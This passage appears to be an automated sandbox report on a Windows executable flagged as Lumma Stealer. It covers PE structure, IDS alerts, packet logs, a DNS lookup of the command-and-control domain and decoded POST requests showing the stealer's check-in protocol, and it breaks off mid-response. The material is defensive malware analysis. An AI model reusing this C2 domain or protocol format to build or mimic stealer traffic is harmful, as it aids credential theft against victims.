                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x71e6940xa0.&u&u
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x9190000xe648d.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x64a6000x1a58.&u&u
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x9170000x1a44.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x3b40000x4c.&u&u
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x342cb0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rdata0x360000x29a30x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0x390000xa1f00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .&u&u0x440000x36f0160x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .&u&u0x3b40000x3c00x40019b8cb995ffb893e00dbfb0795e174aeFalse0.068359375data0.383658687067457IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .&u&u0x3b50000x561a400x561c009b271b4664eb0e7f8ccb5109aa1d1dc5unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .reloc0x9170000x1a440x1c00f8c64e5e41e680232c2e129032909c1aFalse0.3482142857142857data5.704521817564908IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .rsrc0x9190000xe648d0xe660018970bbb712203ef2e06870aa152e03bFalse0.2752019889446555data5.392114485394829IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      TYPELIB0x9197400xb37c8dataEnglishUnited States0.2786108360447022
                      RT_ICON0x9ccf080x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.238672660593872
                      RT_ICON0x9dd7300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.543918918918919
                      RT_ICON0x9dd8580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.4648014440433213
                      RT_ICON0x9de1000x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.48559907834101385
                      RT_ICON0x9de7c80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.4125722543352601
                      RT_ICON0x9ded300x330fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9830158365848061
                      RT_ICON0x9e20400x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.07620075712764698
                      RT_ICON0x9f28680x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.1459022201228153
                      RT_ICON0x9f6a900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.26224066390041495
                      RT_ICON0x9f90380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.2718105065666041
                      RT_ICON0x9fa0e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.4184426229508197
                      RT_ICON0x9faa680x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 1680EnglishUnited States0.44709302325581396
                      RT_ICON0x9fb1200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.499113475177305
                      RT_ICON0x9fb5880x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.4274193548387097
                      RT_ICON0x9fb8700x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.6047297297297297
                      RT_ICON0x9fb9980x130Device independent bitmap graphic, 32 x 64 x 1, image size 256EnglishUnited States0.631578947368421
                      RT_ICON0x9fbac80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.38306451612903225
                      RT_ICON0x9fbdb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.6642599277978339
                      RT_ICON0x9fc6580x130Device independent bitmap graphic, 32 x 64 x 1, image size 256EnglishUnited States0.4901315789473684
                      RT_ICON0x9fc7880x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.43548387096774194
                      RT_ICON0x9fca700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.6859205776173285
                      RT_ICON0x9fd3180x130Device independent bitmap graphic, 32 x 64 x 1, image size 256EnglishUnited States0.5328947368421053
                      RT_ICON0x9fd4480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.375
                      RT_ICON0x9fd7300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.6299638989169675
                      RT_ICON0x9fdfd80x130Device independent bitmap graphic, 32 x 64 x 1, image size 256EnglishUnited States0.3881578947368421
                      RT_ICON0x9fe1080x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.2217741935483871
                      RT_ICON0x9fe3f00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.6403429602888087
                      RT_GROUP_ICON0x9fec980x14Targa image data - Map 32 x 2088 x 1 +1EnglishUnited States1.15
                      RT_GROUP_ICON0x9fecac0xaedataEnglishUnited States0.6724137931034483
                      RT_GROUP_ICON0x9fed5c0x22dataEnglishUnited States1.0588235294117647
                      RT_GROUP_ICON0x9fed800x30dataEnglishUnited States1.0
                      RT_GROUP_ICON0x9fedb00x30dataEnglishUnited States1.0
                      RT_GROUP_ICON0x9fede00x30dataEnglishUnited States1.0
                      RT_GROUP_ICON0x9fee100x30dataEnglishUnited States1.0
                      RT_MANIFEST0x9fee400x64dASCII text, with very long lines (1613), with no line terminatorsEnglishUnited States0.4221946683199008

                      Imports

                      DLLImport
                      KERNEL32.dllExitProcess
                      OLEAUT32.dllSysAllocString
                      ole32.dllCoCreateInstance
                      USER32.dllGetDC
                      GDI32.dllBitBlt
                      KERNEL32.dllGetSystemTimeAsFileTime
                      KERNEL32.dllHeapAlloc, HeapFree, ExitProcess, GetModuleHandleA, LoadLibraryA, GetProcAddress

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                      2024-07-25T06:32:22.783296+0200TCP2844041ETPRO HUNTING Suspicious Zipped Filename in Outbound POST Request (Processes.txt) M249709443192.168.2.5188.114.97.3
                      2024-07-25T06:32:18.200098+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49707443192.168.2.5188.114.97.3
                      2024-07-25T06:32:17.529035+0200TCP2048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration49706443192.168.2.5188.114.97.3
                      2024-07-25T06:32:15.786545+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49705443192.168.2.5188.114.97.3
                      2024-07-25T06:32:23.801097+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49710443192.168.2.5188.114.97.3
                      2024-07-25T06:32:17.095113+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49706443192.168.2.5188.114.97.3
                      2024-07-25T06:33:09.496760+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971740.68.123.157192.168.2.5
                      2024-07-25T06:32:16.198325+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin49705443192.168.2.5188.114.97.3
                      2024-07-25T06:32:31.135756+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971140.68.123.157192.168.2.5
                      2024-07-25T06:32:14.809412+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49704443192.168.2.5188.114.97.3
                      2024-07-25T06:32:23.805727+0200TCP2843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M249710443192.168.2.5188.114.97.3
                      2024-07-25T06:32:19.915054+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49708443192.168.2.5188.114.97.3
                      2024-07-25T06:32:22.373614+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49709443192.168.2.5188.114.97.3
                      2024-07-25T06:32:14.245872+0200UDP2050741ET MALWARE Lumma Stealer Related Domain in DNS Lookup (resergvearyinitiani .shop)6435653192.168.2.51.1.1.1
                      2024-07-25T06:32:15.288502+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin49704443192.168.2.5188.114.97.3

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jul 25, 2024 06:32:14.267342091 CEST49704443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:14.267400026 CEST44349704188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:14.267519951 CEST49704443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:14.269476891 CEST49704443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:14.269496918 CEST44349704188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:14.809238911 CEST44349704188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:14.809412003 CEST49704443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:14.813173056 CEST49704443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:14.813183069 CEST44349704188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:14.813615084 CEST44349704188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:14.856743097 CEST49704443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:14.885627031 CEST49704443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:14.885627031 CEST49704443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:14.885759115 CEST44349704188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:15.288475990 CEST44349704188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:15.288570881 CEST44349704188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:15.288635969 CEST49704443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:15.291486979 CEST49704443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:15.291515112 CEST44349704188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:15.291610003 CEST49704443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:15.291618109 CEST44349704188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:15.298469067 CEST49705443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:15.298520088 CEST44349705188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:15.298588991 CEST49705443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:15.298867941 CEST49705443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:15.298882961 CEST44349705188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:15.786446095 CEST44349705188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:15.786545038 CEST49705443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:15.788110971 CEST49705443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:15.788120031 CEST44349705188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:15.788397074 CEST44349705188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:15.790098906 CEST49705443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:15.790175915 CEST49705443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:15.790230989 CEST44349705188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:16.198307991 CEST44349705188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:16.200299025 CEST44349705188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:16.200396061 CEST49705443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:16.200418949 CEST44349705188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:16.202692032 CEST44349705188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:16.202723026 CEST44349705188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:16.202735901 CEST49705443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:16.202745914 CEST44349705188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:16.202790976 CEST49705443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:16.204832077 CEST44349705188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:16.207096100 CEST44349705188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:16.207113028 CEST44349705188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:16.207139015 CEST49705443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:16.207146883 CEST44349705188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:16.207187891 CEST49705443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:16.208971977 CEST44349705188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:16.210802078 CEST44349705188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:16.210824013 CEST44349705188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:16.210865974 CEST49705443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:16.210874081 CEST44349705188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:16.210895061 CEST44349705188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:16.210920095 CEST49705443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:16.210948944 CEST49705443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:16.211041927 CEST49705443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:16.211055040 CEST44349705188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:16.211066008 CEST49705443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:16.211070061 CEST44349705188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:16.600608110 CEST49706443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:16.600671053 CEST44349706188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:16.600744009 CEST49706443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:16.601255894 CEST49706443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:16.601274014 CEST44349706188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:17.094953060 CEST44349706188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:17.095113039 CEST49706443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:17.096843004 CEST49706443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:17.096853971 CEST44349706188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:17.097119093 CEST44349706188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:17.098756075 CEST49706443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:17.098937988 CEST49706443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:17.098968983 CEST44349706188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:17.529051065 CEST44349706188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:17.529165030 CEST44349706188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:17.529290915 CEST49706443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:17.529495001 CEST49706443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:17.529515028 CEST44349706188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:17.684526920 CEST49707443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:17.684580088 CEST44349707188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:17.684717894 CEST49707443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:17.706597090 CEST49707443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:17.706612110 CEST44349707188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:18.199215889 CEST44349707188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:18.200098038 CEST49707443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:18.201119900 CEST49707443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:18.201138973 CEST44349707188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:18.201402903 CEST44349707188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:18.202955008 CEST49707443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:18.203136921 CEST49707443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:18.203169107 CEST44349707188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:18.203234911 CEST49707443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:18.203250885 CEST44349707188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:18.918818951 CEST44349707188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:18.918909073 CEST44349707188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:18.918972015 CEST49707443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:18.919543028 CEST49707443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:18.919563055 CEST44349707188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:19.445174932 CEST49708443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:19.445231915 CEST44349708188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:19.445306063 CEST49708443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:19.445602894 CEST49708443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:19.445622921 CEST44349708188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:19.914769888 CEST44349708188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:19.915054083 CEST49708443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:19.916317940 CEST49708443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:19.916342020 CEST44349708188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:19.916604996 CEST44349708188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:19.917933941 CEST49708443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:19.918143988 CEST49708443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:19.918176889 CEST44349708188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:19.918243885 CEST49708443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:19.918255091 CEST44349708188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:20.450418949 CEST44349708188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:20.450521946 CEST44349708188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:20.450584888 CEST49708443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:20.450936079 CEST49708443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:20.450961113 CEST44349708188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:21.884136915 CEST49709443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:21.884185076 CEST44349709188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:21.884260893 CEST49709443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:21.884648085 CEST49709443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:21.884661913 CEST44349709188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:22.373385906 CEST44349709188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:22.373614073 CEST49709443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:22.374872923 CEST49709443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:22.374886990 CEST44349709188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:22.375140905 CEST44349709188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:22.376507044 CEST49709443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:22.376507044 CEST49709443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:22.376538038 CEST44349709188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:22.783318043 CEST44349709188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:22.783417940 CEST44349709188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:22.783478975 CEST49709443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:22.783797026 CEST49709443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:22.783823967 CEST44349709188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:23.331752062 CEST49710443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:23.331815958 CEST44349710188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:23.331957102 CEST49710443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:23.332554102 CEST49710443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:23.332578897 CEST44349710188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:23.800941944 CEST44349710188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:23.801096916 CEST49710443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:23.802431107 CEST49710443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:23.802464962 CEST44349710188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:23.802721024 CEST44349710188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:23.804306984 CEST49710443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:23.805284023 CEST49710443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:23.805320024 CEST44349710188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:23.805419922 CEST49710443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:23.805444002 CEST44349710188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:23.805540085 CEST49710443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:23.805572033 CEST44349710188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:23.805680037 CEST49710443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:23.805720091 CEST44349710188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:23.805834055 CEST49710443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:23.805876017 CEST44349710188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:23.806005955 CEST49710443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:23.806035042 CEST44349710188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:23.806050062 CEST49710443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:23.806184053 CEST49710443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:23.806215048 CEST49710443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:23.815197945 CEST44349710188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:23.815399885 CEST49710443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:23.815454960 CEST44349710188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:23.815476894 CEST49710443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:23.815496922 CEST49710443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:23.815599918 CEST49710443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:23.815634012 CEST49710443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:23.815915108 CEST44349710188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:23.816065073 CEST49710443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:23.816117048 CEST44349710188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:23.816123962 CEST49710443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:23.856499910 CEST44349710188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:27.373853922 CEST44349710188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:27.373950958 CEST44349710188.114.97.3192.168.2.5
                      Jul 25, 2024 06:32:27.374123096 CEST49710443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:27.374403954 CEST49710443192.168.2.5188.114.97.3
                      Jul 25, 2024 06:32:27.374427080 CEST44349710188.114.97.3192.168.2.5

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jul 25, 2024 06:32:14.245872021 CEST6435653192.168.2.51.1.1.1
                      Jul 25, 2024 06:32:14.258580923 CEST53643561.1.1.1192.168.2.5

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Jul 25, 2024 06:32:14.245872021 CEST192.168.2.51.1.1.10x3fbStandard query (0)resergvearyinitiani.shopA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Jul 25, 2024 06:32:14.258580923 CEST1.1.1.1192.168.2.50x3fbNo error (0)resergvearyinitiani.shop188.114.97.3A (IP address)IN (0x0001)false
                      Jul 25, 2024 06:32:14.258580923 CEST1.1.1.1192.168.2.50x3fbNo error (0)resergvearyinitiani.shop188.114.96.3A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • resergvearyinitiani.shop

                      HTTPS Proxied Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.549704188.114.97.34434424C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe
                      TimestampBytes transferredDirectionData
                      2024-07-25 04:32:14 UTC271OUTPOST /api HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                      Content-Length: 8
                      Host: resergvearyinitiani.shop
                      2024-07-25 04:32:14 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                      Data Ascii: act=life
                      2024-07-25 04:32:15 UTC818INHTTP/1.1 200 OK
                      Date: Thu, 25 Jul 2024 04:32:15 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Set-Cookie: PHPSESSID=t8d2o6mmgaa5ctjbatt1rmmu35; expires=Sun, 17-Nov-2024 22:18:54 GMT; Max-Age=9999999; path=/
                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                      Cache-Control: no-store, no-cache, must-revalidate
                      Pragma: no-cache
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u6GWI97PI3y51KV6fl5CS%2Fv7W0QsLW8Q83EZt4Wdts5xxFsOn5ichBCSyxbY3cXdi7QNv2Z%2Bf%2FI%2BDQaMvreylCpKqHYI5KE%2FGLFH8F6auHZm3HwDur%2BRgJkA6Jqa%2FE9zMsjtvF68O860m3A%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8a896ccd5f26c431-EWR
                      alt-svc: h3=":443"; ma=86400
                      2024-07-25 04:32:15 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                      Data Ascii: 2ok
                      2024-07-25 04:32:15 UTC5INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.549705188.114.97.34434424C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe
                      TimestampBytes transferredDirectionData
                      2024-07-25 04:32:15 UTC272OUTPOST /api HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                      Content-Length: 61
                      Host: resergvearyinitiani.shop
                      2024-07-25 04:32:15 UTC61OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70 61 6c 70 61 64 69 6e 26 6a 3d 64 65 66 61 75 6c 74
                      Data Ascii: act=recive_message&ver=4.0&lid=GhJLkO--seevpalpadin&j=default
                      2024-07-25 04:32:16 UTC814INHTTP/1.1 200 OK
                      Date: Thu, 25 Jul 2024 04:32:16 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
